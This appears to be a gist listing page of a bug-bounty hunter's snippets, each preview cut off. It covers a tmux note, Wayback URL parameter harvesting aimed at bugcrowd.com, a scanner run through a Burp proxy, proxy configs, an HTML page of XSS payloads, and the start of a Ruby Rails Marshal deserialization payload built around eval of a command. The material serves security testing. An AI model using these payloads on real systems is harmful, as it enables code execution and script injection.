As configured in my dotfiles.
start new:
tmux
start new with session name:
#!/usr/bin/env python | |
import boto3,sys,time,requests | |
import botocore.exceptions | |
from urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
import datetime,os | |
os.environ['AWS_DEFAULT_REGION'] = 'us-east-1' | |
s3 = boto3.resource('s3') |
curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt |
#!/usr/bin/python3 | |
import requests,sys | |
import urllib3,queue,threading | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'} | |
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} | |
urls_inp = sys.argv[1] |
{ | |
"84kr3q1592995213323": { | |
"type": 1, | |
"color": "#cc883a", | |
"title": "Burp", | |
"active": true, | |
"address": "127.0.0.1", | |
"port": 8080, | |
"proxyDNS": false, | |
"username": "", |
{ | |
"30523382": { | |
"className": "Proxy", | |
"data": { | |
"bypassFPForPAC": true, | |
"color": "#f57575", | |
"configUrl": "", | |
"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=", | |
"cycle": false, | |
"enabled": true, |
<html> | |
<head></head> | |
<body> | |
<a href="javascript: alert('clicked xss link')" id="link">click me</a> | |
<img src="xx" onerror="alert('xss')" /> | |
</body> | |
</html> |
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others | |
require 'base64' | |
require 'openssl' | |
require 'optparse' | |
require 'open-uri' | |
SECRET_TOKEN = "SECRET HERE" | |
code = "eval('`COMMAND HERE`')" | |
marshal_payload = Base64.encode64( | |
"\x04\x08" + | |
"o" + |
[array('i', [143, 150]), | |
array('i', [207, 214]), | |
array('i', [753, 760]), | |
array('i', [931, 938]), | |
array('i', [1140, 1147]), | |
array('i', [1390, 1397]), | |
array('i', [1543, 1550]), | |
array('i', [1666, 1673]), | |
array('i', [1950, 1957]), | |
array('i', [4193, 4200]), |
from burp import IBurpExtender,IProxyListener | |
class BurpExtender(IBurpExtender,IProxyListener): | |
def registerExtenderCallbacks(self,callbacks): | |
self._helpers = callbacks.getHelpers() | |
self._callbacks = callbacks | |
self._callbacks.setExtensionName("IProxyListener Params") | |
self._callbacks.registerProxyListener(self) | |
def processProxyMessage(self,messageIsRequest,message): |
As configured in my dotfiles.
start new:
tmux
start new with session name: